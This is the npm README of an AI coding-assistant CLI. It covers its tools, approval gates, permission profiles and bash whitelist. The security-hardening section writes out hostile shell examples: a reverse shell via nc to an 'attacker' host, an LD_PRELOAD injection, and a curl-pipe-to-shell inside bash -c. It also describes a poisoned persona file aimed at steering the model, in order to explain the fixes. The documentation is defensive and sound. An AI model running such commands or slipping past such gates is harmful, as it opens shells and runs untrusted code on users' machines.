@gh3ttoniga/my-ai

v0.11.1

Published

5 days ago

A free, local-first AI coding assistant CLI. Talks to Ollama by default and to Anthropic Claude when configured. Reads files, writes code, runs commands, and uses tools â€” like Claude Code in your terminal.

0High
0Medium
0Low

gh3ttoniga

ai cli claude coding-assistant anthropic ollama local-llm open-source free

my-ai

A free, local-first AI coding assistant CLI. Talks to Ollama by default (any model you have running), and to Anthropic Claude when configured. Reads files, writes code, runs commands, and uses tools — like Claude Code in your terminal.

Default = Ollama = free. Nothing on your machine ever leaves your network. You can switch to Anthropic Claude (paid) any time by editing .env.

What you get out of the box

Streaming chat UI with concurrent tool calls
22 tools: files (read_file, write_file, edit_file, delete_file, move_file), search (Glob, Grep, tree, list_dir), shell (bash + background bash_async/bash_output/bash_kill), web (WebFetch, web_search), dev (git, run_tests, read_lints, notebook_edit), agentic (spawn_agent, TodoWrite, ask_user), and self-extension (add_mcp_server)
Multimodal: @image.png / @doc.pdf / any file becomes a vision/text/extracted part the model can read
31 slash commands, incl. /undo, /map, /stats, /recall, /init, /review, /pr-comments, /rewind, /export, /memory, /context, /skill, /tree, /tree-conv, /mcp
Extensibility: custom slash commands + sub-agents (.my-ai/commands|agents/*.md), lifecycle hooks (.my-ai/hooks.json), skills (7 bundled, auto-activating), plugins (.my-ai/plugins/), and an MCP client with 15 curated presets (browser, git, fetch, db, search, memory, and media: ComfyUI/PiAPI video, ElevenLabs voice, Manim animation)
Self-extension: when asked for something it can't do, my-ai researches a vetted tool (GitHub/npm) and wires it (add_mcp_server) instead of refusing
Desktop app (my-ai serve web UI + Electron .exe shell), headless (my-ai -p "task" for CI/pipes), and an importable Agent SDK (createAgent().run())
Provider abstraction: local Ollama, Anthropic Claude (incl. claude-fable-5/claude-opus-4-8), or OpenRouter/MiniMax M3 — via .env
A layered safety model: bash whitelist, danger-tagged approval prompts, sandbox (MY_AI_SANDBOX_ROOT), user rules (.my-ai/rules.json), secret redaction, an audit log, and three permission profiles
A Claude-Code-style chip surface for parallel tool batches: status pills, conflict warnings, per-batch timing, and a per-turn cost row (see What you'll see)
762 unit tests (pure-logic, no I/O — npm test) plus end-to-end smokes
System prompt and tool-loop behavior inspired by Claude Code's publicly documented patterns — independently reimplemented here, not derived from upstream source

What's new in 0.11.0

The phase E1–E9 sweep toward full free-Claude-Code parity:

Media generation (MCP presets): comfyui (local image/video/audio/3D), piapi (cloud video/music/3D), elevenlabs (TTS/STT/voice), manim (animation video). /mcp add <name>.
Knowledge layer — skills: .my-ai/skills/*.md + 7 bundled (ui-ux, security, code-review, testing, performance, accessibility, api-design) that auto-activate on trigger keywords. /skill.
Extensibility: custom commands + sub-agents from files, lifecycle hooks, plugins (bundles of the above).
Background shells: bash_async / bash_output / bash_kill for dev servers, watchers, builds.
Headless + SDK: my-ai -p "task" (clean stdout, CI-ready) and createAgent().run().
Seven built-in commands: /init /review /pr-comments /rewind /export /memory /context.
Notebooks: notebook_edit for .ipynb cells. MCP resources: /mcp resources + /mcp read.
Self-extension: the agent acquires missing capabilities (research → add_mcp_server → relaunch).
Integrations: a GitHub Action headless runner (.github/workflows/my-ai.yml) and a VS Code extension scaffold (vscode-extension/).

What's new in 0.7.5

Five autonomy primitives wired into the existing CLI loop, all default-OFF (today's behavior is byte-identical without opt-in env). See also the Security hardening (0.7.5) section below for the three security fixes in this release, and the What you'll see section for the parallel-tool chip surface.

spawn_agent

Sub-agent delegation is now on the tool list (src/subagent.ts#SPAWN_AGENT_TOOL), with recursion bounded at 1. SUBAGENT_TOOLS strips spawn_agent from the child's tool surface AND runToolForSubAgent rejects spawn_agent by name as defense-in-depth so a future caller passing a wider tool set still cannot recursively spawn. The sub-agent's intermediate chat chatter never interleaves with the parent display (silent onText / onReasoning wrappers); only the final answer lands as the tool_result the parent model sees, plus a single dim ⹑ sub-agent: <N> turns, <M> tool(s) line on stderr. Activate: just ask the model to delegate a focused sub-task; no env var, no slash command.

budget

Per-task token/turn budget guard (src/budget.ts). Set MY_AI_MAX_TOKENS=N (positive int) and/or MY_AI_MAX_TURNS=N (positive int) in .env to cap a single agent loop. Either unset = unlimited; both unset = byte-identical to pre-0.7.5 behavior. When tripped the loop emits ⛔ stopped: <reason> and drops the user prompt without history corruption. Pin: tests/budget.test.ts verifies the byte-identical default-OFF behavior.

retry

Self-correction retry policy (src/retry.ts). Set MY_AI_AUTO_RETRY=1 (accepts 1 / true / yes / on) to enable. The model re-plans a failed tool call once with a synthetic correction injected as a tool_result-style message; escalate routes the model toward ask_user after the cap. MY_AI_MAX_RETRIES=N (default DEFAULT_MAX_ATTEMPTS = 2 = 1 original + 1 retry) bounds repeat storms. Pin: tests/retry.test.ts 6 fixtures cover accept / retry / escalate.

certifier

Tier 2.0 model-mode certifier upgrade (src/certify-model.ts#certifyWithModel). Set MY_AI_CERTIFY=model (or /certify model mid-session) so the active provider re-judges each tool result. The heuristic verdict is replaced on the model's pass / warn, preserved on unknown (fail-safe - a flaky model call cannot downgrade a confident pass). Per-tool upgrade writes an audit row to .my-ai/audit.log so the model's reasoning is visible. Pin: tests/certify-model.test.ts 4 fixtures verify the unknown-fail-safe.

sessions

Three new slash commands: /save [id] writes the in-memory messages[] to .my-ai/session-<safeId(id)>.json (default id "default"), /resume <id> splices it back over the in-memory messages, /sessions lists the saved set newest-updated first. Set MY_AI_AUTOSAVE=1 to autosave to a fixed session-autosave.json slot on every /exit AND SIGINT; default OFF preserves today's drop-on-exit semantics. Pin: tests/session.test.ts 5 fixtures cover round-trip + malformed input.

OpenRouter / MiniMax provider

The OpenAI-compatible dispatch in src/providers/ollama.ts already works against any OpenAI-compatible endpoint - set OPENAI_BASE_URL=https://openrouter.ai/api/v1 and OPENAI_API_KEY=<gateway-key>, leave PROVIDER=ollama. For MiniMax run a local proxy (e.g. llama.cpp --server) and point OPENAI_BASE_URL at it; the request/response shape already matches the OpenAI Chat Completions schema. No code changes; the path is documented and end-to-end-verified.

What's new in 0.8.0

The Tier 2.0 + autonomy night-run lands seven architectural commits (N1–N7) plus three smoke runners, two new modules, and 544 tests with 11 regression locks. The user-facing deltas:

certifyBatch is now async — the per-tool model-mode upgrade loop lives inside src/certify-batch.ts instead of being dispatched inline in src/cli.ts#agentTurn. Set MY_AI_CERTIFY=model to upgrade each heuristic verdict via a single-shot askOnce to the active provider; unknown from the model is fail-safe (preserves the heuristic, never downgrades a confident pass). Use the /certify model slash command to switch mid-session.
MCP servers wire from .my-ai/mcp.json at boot — define {"image":{"command":"npx","args":["-y","@modelcontextprotocol/server-canvas"]}} and the namespaced tools (mcp__image__generate etc.) register at startup. Per-server try/catch isolates failures; missing config silently no-ops. The CLI prints 🔌 mcp: <N> MCP server(s) · <K> native tool(s) registered under the boot banner so you can see the result.
move_file is a gated first-class tool — joins bash / delete_file / read_lints in the [y/N] gate under the default profile; refused under readonly. Works across devices (EXDEV copy-then-remove); creates destination parent dir.
/decompose <goal> instant plan tree — one model call returns a numbered plan; parsePlan + renderPlan print ○/▶/✓/✗ glyphs. Re-issue bare to reprint the active plan, or with no plan in memory for a (no plan in this session — /decompose <goal> first) line.
OpenRouter / MiniMax / DeepSeek reasoning shows in the thinkpad — provider-field reasoning (delta.reasoning, reasoning_content, reasoning_details[]) now flows through the 💭 stderr channel via src/think-reasoning.ts#extractReasoning. Inline-tag reasoning (Ollama, Anthropic with extended thinking) unchanged.
PROVIDER_PRESETS for first-run UX — four curated entries (openrouter / minimax / lm-studio / vllm) come with the package; formatPresetsList() renders them for /doctor --explain presets. Hosted vs local are distinguished via requiresApiKey.
MY_AI_AUTOCOMMIT opt-in auto-commit — after a write_file/edit_file under --no-approve / MY_AI_AUTO_APPROVE / paranoid-accepted, src/autocommit.ts runs git add -A && git commit -m <tool: preview>. Best-effort, never throws; routes through child_process.execFile (NEVER shell:true); sanitizes multi-line forges and caps the message at 200 chars.
Three E2E smoke runners — tools/certify-smoke.ts (certifier modes), tools/retry-smoke.ts (accept/retry/escalate), tools/session-smoke.ts (/save roundtrip). All run the real CLI in tmpdir against PROVIDER=mock + MY_AI_MOCK_SCRIPT — no Ollama / network required.
Pre-release gate + cut orchestrator — tools/pre-tag-check.sh (11 regression locks mirroring CI) and scripts/release-cut.sh (defaults dry-run; --apply performs the cut). Run npm run pretag then npm run release-cut -- --apply.

What's new in 0.8.1

A quality + test-coverage patch closing the post-v0.8.0 BUGLIST-pass2 audit. No user-facing surface change — every command, flag, env var, and slash command behaves identically to 0.8.0. The release is a refactor + documentation + test-completeness honest-bump: 544 unit tests now pass, up from 477 at v0.8.0.

src/cli.ts table-driven dispatch + catalog dedup — the 14-arm if/else-if REPL slash-cascade collapses to a single Map-driven dispatch via the new src/dispatch.ts (slashCommands Map + 19-entry DEFAULT_COMMAND_METADATA catalog as the single source of truth for both dispatch and printHelp). Routing fix: /save [id] and /resume <id> are indexed as bare /save and /resume (since parseSlash splits on first whitespace), so a /save abc call routes correctly to the canonical cmd key. The new registerAllSlashCommands in src/cli.ts iterates the catalog and binds each entry to a handlersByCmd map of SlashHandler closures over module state — a missing-handler throws at module-load, so wiring drift fails fast rather than silently stub-falling.
Documentation completeness — docs/COMMANDS.md is now the canonical reference for all 19 commands (16 advertised + 3 hidden), with cmd / intent / response shape / when to use columns. Defensive-path test coverage on src/session.ts, src/doctor.ts, src/redact.ts (the M1+M2+M3 work).
Test coverage closed — 12 new fixtures in tests/certify-batch.test.ts pin the public surface of certifyBatch(calls, opts) ⇒ Promise<BatchCertification> (heuristic + N7 model-mode upgrade pass + 3 fail-safe paths + multi-call ordering). This was the last src/ file lacking unit-test coverage after H2 closed both providers. tests/commands.test.ts + tests/persona.test.ts close the L2 / L3 catalog-shape and DEFAULT_PERSONA uniqueness contracts with grep + structural-shape pins.

Try it: npx @gh3ttoniga/[email protected]. The Tier 1.4–1.9 chip layer, BUF-1–3 autonomy primitives, Tier 2 certifier, MCP wiring, and move_file gate behavior are unchanged from v0.8.0.

What's new in 0.7.4

Parallel-write collision — when two writes target the same path, a ⚠ colliding writes at indices i,j row warns you before they race.
Auto-serialize opt-in — set MY_AI_AUTO_SERIALIZE=1 to ship colliding writes in order; they apply sequentially with the last write winning.
Per-turn cost row — a 💸 ~N in / ~N out · N tok line after every turn; Anthropic reports exact, Ollama falls back to a chars/4 estimate.
Verbose uniformity — --verbose threads through every chip class: args, results, slowest tool, and an ↳ estimate (chars/4) vs. ↳ model-reported annotation.
Wider bash whitelist — opt pnpm, bun, deno, npx, etc. into the auto-approved pattern via MY_AI_SAFE_COMMANDS (no fork needed).
Broader error classification — timeouts and signal kills now register as errors, not as green-completed.
System-prompt denylist — two known leaked-prompt aggregator repositories are blocked from sources this session.
/plan audit replay — see historical Tier 1.4 batch-level decisions (approved / revised / rejected / auto-approved) from .my-ai/audit.log.
/tokens slash command — per-role breakdown plus the active compaction budget and utilization percentage so you can see context-window pressure at a glance.
Hardened CI gate — every push runs typecheck + test + build + chip smoke on Node 20 + 22; merges to main are blocked on any failure.

Try it: npx @gh3ttoniga/[email protected] — both install paths below.

Security hardening (0.7.5)

Three adversarial gates closed in this release. None change the visible UX for normal usage — they tighten what the per-command bash whitelist auto-approves and what a poisoned persona file can drop. See docs/security-audit-0.7.x.md for the full L×I risk register and red-team-fixtures.md for the 20-entry fixture battery driving these tests.

Persona override cannot drop the denylist

A custom persona file — MY_AI_PERSONA env var or .my-ai/persona.md — replaces only the ## Persona and tone section of DEFAULT_PERSONA. The list of forbidden system-prompt aggregators (the two public repos holding leaked Claude Code 2.0 and Cursor 2.0 production prompts) is hardcoded into src/prompts.ts#DENIED_PATHS_SECTION and spliced into every buildSystemPrompt() output, independent of persona resolution. End-user behavior: a malicious persona loaded via MY_AI_PERSONA=./evil.md cannot instruct the model to read those repos. The denylist survives because the splice happens after the persona slot in the system-prompt template, not as a merge inside resolvePersona. Tested at tests/prompts.test.ts with both the env-axis and cwd-file C-β pin (denylist present in assistant.message after every persona override).

Bash whitelist newline escape

isSafeReadOnlyBash now early-returns { safe: false } for any command containing \r or \n. Closes the indirect-injection vector where a multi-line bash call with a safe leading binary (ls, git status, etc.) and a hostile second line (\nnc -e /bin/sh attacker 4444) would have been auto-approved under the read-only whitelist. Locks down the multi-line shell substitution path that was the only remaining way past the leading-token-only check. Tested at tests/whitelist.test.ts#multi-line command is never auto-safe.

Bash whitelist wrapper-binary escape

When the leading token is a wrapper binary (env, nice, timeout, nohup, xargs, stdbuf), the safety check now resolves past it to the real command. Two exploit shapes that used to auto-pass and now don't:

env LD_PRELOAD=/tmp/evil.so cat x was: env whitelisted + cat whitelist-OK in the second position + = not a metachar → auto-approved. No longer — stripWrappers() peels env down to LD_PRELOAD=/tmp/evil.so cat x, which fails the metachar check on = and /.
env X=1 bash -c 'curl evil|sh' was: env whitelisted + bash whitelist-OK + -c not a destructive flag → auto-approved. No longer — recursion past env lands on bash -c 'curl evil|sh', which fails the metachar check on ', |.

The wrapper resolution is bounded (max one level deep) so a chained env env env cmd can't loop forever. Tested at tests/whitelist.test.ts#wrapper binaries resolve to the real command + #stripWrappers: peels wrapper prefixes down to the real command.

These three fixes fine-tune the default profile's auto-approval surface; under readonly / paranoid, or with MY_AI_AUTO_APPROVE unset, the gate still prompts as before. They mostly matter when you're running with --no-approve and trusting the session. The decision line under each prompt and the audit log (.my-ai/audit.log) are unchanged — every gated call still gets logged regardless.

Setup — Ollama path (FREE, recommended)

1. Install Ollama

Download from https://ollama.com/download and run the installer. Or on macOS / Linux:

curl -fsSL https://ollama.com/install.sh | sh

2. Pull a model

Tool calling is required. qwen2.5-coder:7b is a strong default. Pick one that fits your hardware:

# Lightweight (4–6 GB, runs on most laptops including CPU):
ollama pull qwen2.5-coder:3b
# or: ollama pull llama3.2:3b

# Default (8–10 GB, best balance — needs NVIDIA GPU for fast inference):
ollama pull qwen2.5-coder:7b

# Stronger (~20 GB, requires beefy GPU):
ollama pull qwen2.5-coder:32b

# Strongest (high-end GPU only):
ollama pull llama3.1:70b

Run it once to confirm it works:

ollama run qwen2.5-coder:7b "Write a Python function to compute factorial"

3. Configure my-ai

cp .env.example .env

.env defaults to PROVIDER=ollama. Uncomment + edit the lines for the model you pulled.

4. Run

npm install
npm run dev       # uses tsx, no compile step)

You should see the my-ai banner, then a you › prompt.

Setup — Anthropic path (paid, opt-in)

If you'd rather use Claude over the API (highest capability):

In .env, set:

PROVIDER=anthropic
ANTHROPIC_API_KEY=sk-ant-...

npm run dev

Setup — MiniMax media (MCP integration, opt-in)

my-ai supports the Model Context Protocol (MCP) to plug in external tools. To enable MiniMax image + video + TTS:

pip install uvx
Inside the my-ai REPL, run /mcp add minimax
Edit .my-ai/mcp.json and fill your MINIMAX_API_KEY from the MiniMax platform dashboard. MINIMAX_API_HOST defaults to https://api.minimax.io (override only for self-hosted or regional shards).
/exit and relaunch — MCP wiring runs at boot. Expect under the banner:

   plser mcp: 1 MCP server(s) ah 8 native tool(s) registered
       ahev mcp:minimax (8 tools)

Plus a /mcp show row minimax (green).

Namespacing: two MCP servers can both expose generate_image; the CLI distinguishes them by server prefix (mcp__minimax__generate_image vs. mcp__flux__generate_image). Every mcp__* call goes through the standard [y/N] gate on every profile. Bypass with MY_AI_AUTO_APPROVE=1. See docs/mcp-media.md for the full setup steps (uvx install + API key + host override + troubleshooting + tool table).

Usage

First-time

npm install
cp .env.example .env
# edit .env to choose PROVIDER + model

npm run dev           # fastest iteration
# or
npm run build && npm start   # production run

Install & run

End users on any machine can run the published CLI without cloning — pick one:

# Reproducible — pins to the tested 0.7.4 release line:
npx @gh3ttoniga/[email protected]

# Track-the-latest global install — update with `npm i -g` again to bump:
npm i -g @gh3ttoniga/my-ai

The exec name is my-ai (mapped by package.json#bin to dist/cli.js). If you cloned the repo, the launcher in bin/run.sh (POSIX) / bin/run.ps1 (Windows) resolves the project root and prefers the compiled dist/cli.js so clone-developers get the same my-ai CLI surface:

npm install
npm run build
./bin/run.sh         # POSIX
./bin/run.ps1        # Windows

Web UI (`my-ai serve`)

A small HTTP server that drives the SAME agent loop the REPL uses — same provider dispatcher, same toolHandlers, same message envelope. Useful when you'd rather use a browser than the terminal, or when you'd like to expose the agent on a dashboard / piped through another service.

# Boot the web UI on the default port (8787, bound to 127.0.0.1)
my-ai serve

# Custom port + uploads directory
my-ai serve --port 3000 --uploads ./shared-uploads

# OS-assigned ephemeral port (handy in tests / multi-service dashboards)
my-ai serve --port 0

# LAN-share an existing model config without auto-launching a browser
my-ai serve --host 0.0.0.0 --no-open

The UI runs at http://127.0.0.1:<port>/ (the default browser opens on boot — best-effort, never throws — --no-open skips the spawn). It exposes a chat transcript with bubble-style messages (user / assistant / reasoning / uploaded-file pills), live SSE streaming (event: chunk per model delta + event: done with the final assistant text + event: error if the engine throws), an Upload button that POSTs to /api/upload (saved under ./uploads by default), and a GET /api/files list endpoint for the round-trip smoke. Routes:

GET / — static UI shell (no build pipeline; ui/index.html).
GET /health — {"ok": true, "host": "<addr>", "port": <n>} liveness probe (used by the UI's status badge + any external /doctor-style curl smoke).
GET /api/files — {"files": ["<name>", ...]} list of uploaded filenames (sorted, dotfiles filtered).
GET /api/files/<name> — downloads with the right Content-Type via safeFilename (404 if missing).
POST /api/upload?name=<fn> — raw body becomes the file under ./uploads/; returns {"file": "<safe>", "bytes": <N>}. Filenames are sanitized via safeFilename — separators stripped, leading dots stripped, illegal chars (:*?"<>|) replaced, length clamped to 200, "file" fallback for empty.
POST /api/chat — Server-Sent Events stream of one agent turn; send {message, files?} (single-message + optional file basename list — server is stateless, UI maintains history locally), receive event: chunk per onChunk call + event: done with the engine's return value + event: error if the engine throws.

The chat surface reuses the same client.chat() call the REPL uses via src/agent-engine.ts — a single-message async function adapter ((message, onChunk, files) => Promise<string>) that wraps the existing provider call. REUSE-DON'T-FORK: same provider dispatcher, same persona + denylist + project block, same {role, content} message envelope the REPL uses; no second agent path. Power features (Tier 1.4 plan gate + certifier + budget/cost cap + profile/danger/prompt gate + Tier-1.6 chip layer + slash commands) stay terminal-only — they're an interactive UX and don't translate to a streaming HTTP consumer. A future tier could lift a sub-set into a request-level policy, but the wire today is "send your message + files, get streamed text back".

In-chat commands

/help - list available commands
/clear - reset the conversation history
/todos - ask the model to print the current todo list
/doctor - diagnose provider + model setup (free-engine friendly)
/doctor --explain <check> - root cause + one-line fix for a failing check (server, model, key, tools)
/model [name] - show or switch the active provider at runtime (ollama, anthropic)
/profile [name] - show or switch the permission profile (default, readonly, paranoid); persists to .my-airc
/compact - force-summarize older turns now to free up context
/tokens - show estimated-token breakdown of the current conversation (per role + total) plus the active compaction budget and utilization percentage, so you can see how full the context is without leaving the chat. Reads MY_AI_COMPACTION_BUDGET (same var as the compactor) — malformed input falls back to the 8000-token default silently so a bad env var can never break the inspection.
/persona - show the active voice / push-back / style-defaults persona caption (resolved at boot from MY_AI_PERSONA file path or .my-ai/persona.md)
/persona reload - prints a note that the caption is captured at boot; reloading mid-session is a no-op (exit + re-launch to pick up an edited persona file)
/persona reset - show how to return to the built-in default persona (clear .my-ai/persona.md / unset MY_AI_PERSONA, then re-launch)
/plan - replay the Tier 1.4 batch-level plan-gate decisions recorded in .my-ai/audit.log (filters the plan-* audit lines: approved / revised / rejected / auto-approved). The gate's pure-logic decision (evalPlanGate / estimateBatchLineDelta / renderPlanCard) lives in src/plan.ts (~180 lines, no I/O); end-to-end exercised by tools/tier1.4-smoke.ts.
/tree [path] - print a compact directory tree rooted at path (defaults to cwd). Skips node_modules, .git, build/CI caches, and dotfiles by default; capped at depth 3 + 200 entries; unreadable dirs are silently skipped. Delegates to src/explore.ts#fsTree (also powers the tree model tool the parent + read-only sub-agents can call). Same ↳/truncation rules as the width-time tools/tier1.6-chip-smoke.ts family of fixtures.
/tree-conv - show this session's conversation as a git-style tree. The REPL persists each message as a JSON node under .my-ai/conversation/<id>/ (one file per message, each linking to its parent); /tree-conv reads them back and prints an indented outline with role glyphs and a branch point(s) footer (a node gains a second child when you rewind with /undo and continue). Best-effort — a write failure prints a dim warning and never breaks the turn. Delegates to src/conversation-tree.ts.
/mcp - list curated MCP presets; /mcp add <preset> wires one into .my-ai/mcp.json; /mcp show lists connected servers; /mcp resources / /mcp read <server> <uri> browse a server's resources
/skill [name] - list skills (.my-ai/skills/*.md + bundled), or activate one into the system prompt; skills also auto-activate on trigger keywords
/undo - restore the most recent file change (the last write/edit/delete/move)
/map [path] - print a compact exported-symbol map of source files (default src)
/stats - per-session tool-usage table (calls, errors, total ms)
/recall <query> - search saved sessions (.my-ai/session-*.json) for text
/init - scan the repo and write a CLAUDE.md project-memory file
/review [staged] - have the model review the current git diff (add staged for the index)
/pr-comments [n] - list review comments on a PR via the gh CLI
/rewind [n] - drop the last n exchanges from the conversation (default 1)
/export - export the conversation to a markdown file under .my-ai/
/memory <fact> - append a fact to .my-ai/instructions.md and apply it this session
/context - estimated token-window usage by role (system / user / assistant / tool)
/save [id], /resume <id>, /sessions, /decompose <goal> - session + planning helpers
/exit - quit (also: /quit or Ctrl+C)

What you'll see — the chip surface

When the model calls tools, each parallel batch renders as a bracketed cluster of status "chips" on stderr (the visible answer stays clean on stdout):

⚡ 3 tools in parallel
  ○ read_file({"path":"src/a.ts"})
  ○ bash({"command":"ls"})
  ○ write_file({"path":"src/a.ts", ...})
  ● read_file  src/a.ts · 42 lines
  ● bash  $ ls · 7 lines
  ● write_file  src/a.ts · CREATE (+12 lines)
  ⚠ src/a.ts · colliding writes at indices 0,2
  ⚡ 3 tools · 1.2s

Pending pills (○, cyan) print once per tool before dispatch — one aggregate ⚡ N tool(s) in parallel header, then a pill per call (Tier 1.6).
Completed pills tint by outcome: ● green ok, ✖ red error (any Error… result or a non-Exit: 0 bash wrap — incl. timeouts/signal kills), ⊘ yellow blocked (a readonly-profile refusal). Each carries a one-line hint (<path> · CREATE (+N lines), ±N lines, $ <cmd> · N lines, …) (Tier 1.6).
Conflict chip (⚠, Tier 1.8): when two tracked writes (write_file / edit_file / delete_file) in the same batch target the same path, a ⚠ <path> · colliding writes at indices i,j row warns that they'd race; under the default profile this also escalates the batch to the plan gate (Path A) so you approve before they apply.
Batch timing (⚡ N tools · <time>, Tier 1.7): the closing bracket of every batch — wallclock for the concurrent dispatch, Nms under a second, N.Ns over.
Cost row (💸, Tier 1.9): a per-turn token estimate row (~<in> in / ~<out> out · <total> tok). Anthropic reports real usage; Ollama is a chars/4 estimate.

Under --verbose (or /verbose on) the cluster expands homogeneously (Tier 1.9): each pending pill gains a dim ↳ args: <full JSON> line, each completed pill a ↳ result preview, the timing line names the ↳ slowest: <tool>, and the cost row annotates ↳ estimate (chars/4) vs. ↳ model-reported.

Free engine troubleshooting (`/doctor`)

Run /doctor anytime to check whether the free (Ollama) engine is set up correctly. It probes the configured provider, lists installed models, flags which ones can do tool calling, and tells you the next step.

✅ All green → "Free engine ready" — start typing.
⚠️ Ollama not reachable → install + start, with copy-pasteable setup steps.
⚠️ Model not installed → "set OLLAMA_MODEL= in .env" if a tool-capable one is already on disk, or ollama pull <model> if not.
For Anthropic, /doctor just verifies ANTHROPIC_API_KEY is set.

Troubleshooting

When a check fails, ask for the root cause and a one-line fix instead of a bare status:

/doctor --explain server     # is the Ollama daemon reachable? how to start it
/doctor --explain model      # is the configured model installed? pull recipe
/doctor --explain key        # is ANTHROPIC_API_KEY set? where to get one
/doctor --explain tools      # are tools registered?

Each prints cause: (what's actually wrong) and fix: (a copy-pasteable next step). model defers to server when the server is down, so you fix the upstream problem first.

| Symptom | Try | |---|---| | "Ollama not reachable" | /doctor --explain server → ollama serve, or fix OLLAMA_BASE_URL | | Model answers but ignores tools | model isn't tool-capable — /doctor lists which installed models are; switch with /model or OLLAMA_MODEL | | Last few characters of an answer look cut off | fixed in 0.4.x — update; the streaming flush now drains trailing chars | | Every command prompts even safe ones | you're on the paranoid profile — /profile default | | bash calls are refused | you're on the readonly profile — /profile default | | Approval prompt loops in a script | non-TTY can't approve — pass --no-approve or set MY_AI_AUTO_APPROVE=1 |

Approval gate

Destructive and shell-spawning tools (bash, delete_file, read_lints) show [y/N] before running — the safe default. Bypass it when you trust the session:

One-shot (per invocation): my-ai --no-approve
Persistent (set once in .env): MY_AI_AUTO_APPROVE=1 (also accepts true/yes/on)

When the gate is bypassed, every gated call runs without prompting and a ⚠ auto-approved (--no-approve) line is logged to stderr. Reads, writes, edits, glob, grep, web fetch, web search, and todo tracking are never gated.

The decision line under each prompt tells you exactly what will happen — e.g. $ rm -rf node_modules for bash, the file path for delete_file, or the file being linted for read_lints. When the command matches a risky pattern (recursive rm, --force / --force-with-lease, force push, raw dd writes, chmod/chown, sudo, pipe-to-shell, git reset --hard/rebase/filter-branch) a red danger badge is shown on the prompt so it can't be rubber-stamped.

Every gate decision — auto-approved, whitelisted, approved, rejected, blocked — is appended to .my-ai/audit.log (tab-separated: timestamp, decision, tool, danger tags, input preview). Logging is best-effort and never blocks the loop. .my-ai/ is gitignored.

Permission profiles

A coarse safety dial layered on top of the per-command whitelist. Switch at runtime with /profile <name>; the choice persists to .my-airc (gitignored). You can also set it per session with MY_AI_PROFILE, which takes precedence over the file.

| Profile | Per-tool gate | --no-approve / MY_AI_AUTO_APPROVE | Tier 1.4 plan gate (write-heavy batch) | |---|---|---|---| | default | Read-only bash auto-approved via whitelist; other gated tools prompt [y/N]. | Bypasses the [y/N] prompt (decision still audit-logged). | Fires on ≥2 file writes or ≥50 estimated new lines; a Tier 1.8 same-path collision also escalates an under-threshold batch to the plan card (Path A). Approving the plan suppresses the per-write diff prompts. | | readonly | Refuses subprocess-spawning tools (bash, read_lints) outright. File read/write/edit still work. | N/A for shell tools (already blocked). | Skipped — writes are allowed, but nothing shells out. | | paranoid | Every tool call (except ask_user) requires [y/N]. | Ignored — paranoid always prompts. | Layered: you see the plan card and each per-write diff prompt. |

Environment variables

| Var | Values | Effect | |---|---|---| | MY_AI_PROFILE | default | readonly | paranoid | Permission profile for the session; takes precedence over .my-airc. | | MY_AI_AUTO_APPROVE | 1 / true / yes / on | Skip the [y/N] approval prompt (every decision is still audit-logged). Same effect as the --no-approve flag. | | MY_AI_SAFE_COMMANDS | CSV / whitespace list of binary basenames | Extend the read-only bash whitelist without forking (e.g. pnpm,bun,deno,npx). Metachar + destructive-flag checks still apply. | | MY_AI_COMPACTION_BUDGET | positive integer (default 8000) | Token budget before older turns are compacted. Negative / non-numeric throws fast on the first compaction call. | | MY_AI_AUTO_SERIALIZE | 1 / true / yes / on | Tier 1.8 Path B (opt-in, off by default). On a same-path write_file / edit_file / delete_file collision in a batch under the default profile, src/plan.ts serializeCollisions reorders the colliding calls into a sequential slice so writes apply lowest-index→highest-index (the highest-index write wins, no Promise.all race), and src/chips.ts printAutoSerializeNote surfaces a neutral dim ↳ auto-serialized: <path> indices <i,j,k> row instead of the Tier 1.8 ⚠ warning. The Tier 1.4 plan-gate escalation (Path A) is also skipped. End-to-end exercised by Scenario E in tools/tier1.6-chip-smoke.ts. | | MY_AI_PERSONA | path to a persona file | Voice / push-back / style-defaults caption, resolved at boot (file path only — not inline text). Falls back to .my-ai/persona.md, then the built-in default. |

Reasoning models (`think` discipline)

Reasoning-capable Ollama models (deepseek-r1, qwen3 with reasoning mode, llama 3.x with extended thinking) and Anthropic Claude with extended thinking emit a private scratch section inline in their response - between think.../think markers for Ollama, or as a separate thinking content block for Anthropic. The CLI captures that section as a dim "thinkpad" transcript on stderr (prefixed with a thinking emoji) so you can see what the model is reasoning about, and the final stored assistant message is stripped of those markers so the reasoning never becomes payload for the next turn. The visible answer on stdout stays clean.

Whitelisted read-only bash commands

A small set of obviously-safe bash commands skip the prompt entirely, even when the gate is on. They are logged as ⚙ safe (whitelisted read-only: <command>).

Plain binaries (any args): ls, cat, head, tail, less, more, wc, file, stat, pwd, tree, du, basename, dirname, realpath, readlink, which, whereis, type, grep, rg, diff, sort, uniq, tr, cut, strings, ps, top, htop, pgrep, help, man, info, history, env, printenv, echo, date, whoami, hostname, uname, uptime, jq, xxd, hexdump, base32, base64
git read-only subcommands (2nd token): status, log, diff, show, branch, remote, rev-parse, tag, stash, ls-files, ls-tree, shortlog, describe, blame, reflog (note: config is not whitelisted — git config foo bar writes to .git/config, so it always prompts)
npm read-only subcommands (2nd token): test, ls, view, list, info, audit### Extending the whitelist (no fork needed)

You can extend the safe-command list without forking the project via the MY_AI_SAFE_COMMANDS env var. Comma- or whitespace-separated binary basenames are added to the read-only set; useful for opting pnpm, bun, deno, npx, etc., into the auto-approved pattern. Example in .env:

MY_AI_SAFE_COMMANDS=pnpm,bun,deno,npx

Safety checks (metachars, destructive flags) still run first and unconditionally, so this widens read-only recognition but never bypasses the lookup. The leading-token match is basename-based, so /usr/local/bin/pnpm and pnpm both register as pnpm. To stay safe, do NOT add bash, sh, python, node, or any other subshell-capable binary — they'd auto-pass the leading-token check, and a bash -c … invocation wouldn't trip any metachar inside the -c argument.

The whitelist refuses any command with shell metacharacters (;&|<>$(){} ^`` =) or destructive flags (-delete, -exec, --rm, --delete, --force, --write, --set-output). Anything that could chain (&&) or pipe (|`) into another command always prompts. Commands not on the list also always prompt — better safe than quiet.

Compaction budget

When the running message list exceeds the compact-trigger threshold (in estimated tokens), the oldest turns are folded into a single summary and the tail is preserved verbatim (see src/compaction.ts). The threshold defaults to 8000 tokens (cheap chars/4 heuristic, no tokenizer dependency).

For long sessions and large contexts you may want to raise it. For shorter conversations or hardware-constrained runners you may want to lower it. Set in .env:

# Tunable; must be a non-negative integer. Leave unset to use 8000.
MY_AI_COMPACTION_BUDGET=8000

Bad input (negative, non-numeric) fails fast on the first compaction call with a clear message — easier to debug than a silent fallback. Calling code can also pass maxTokens explicitly to compactMessages(), which always wins over the env var.

Try it

you › create a hello.py file that prints "hello from my-ai" and runs it

